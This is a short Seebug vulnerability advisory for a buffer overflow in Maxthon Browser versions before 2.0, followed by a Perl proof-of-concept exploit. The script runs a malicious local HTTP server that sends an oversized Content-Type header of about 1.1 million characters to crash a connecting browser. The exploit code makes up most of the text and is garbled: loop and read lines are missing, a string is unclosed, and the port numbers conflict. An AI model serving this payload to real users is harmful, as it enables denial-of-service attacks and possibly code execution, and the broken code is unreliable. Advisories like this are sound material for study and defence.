Maxthon Browser 1.x Content-Type Buffer Overflow Vulnerability

ID SSV:85497
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00



Maxthon Browser is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Maxthon Browser 2.0 are vulnerable.

                                                #!/usr/bin/perl  # Maxthon Browser << 2.0 Stack Overflow Crash  # Descoverd by DATA_SNIPER  # Usage:   #connect from maxthon browser to http:/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen    => 1,
LocalAddr => 'localhost',
LocalPort => 80,
Proto     =>
 'tcp');  die unless $sock;
$huge="A" x 1100000;
$|=1;  print "===================================================================\n";
print " Mawthon Browser << 2.0 Stack Overflow Crash\n";
print "               Bug Descoverd by DATA_SNIPER\n";
print " GreetZ To:Alpha_Hunter,Pirat Digital,Xodia,DelataAzize,AT4RE Team,all algerian hackers\n";
print "               Mail me at:Alpha_three3333(at)yahoo(dot)com\n";  print "   BigGreetZ To:,\n";
print"===================================================================\n";  print " [+] HTTP Server started on port 70... \n";
print" [+]Try IExplore \n";
$z=$sock->accept();  print " [+]connection
print $ln;
 chomp $ln;
 if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
print " [<>]Sending Evil Packet\n";
print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
} while (true);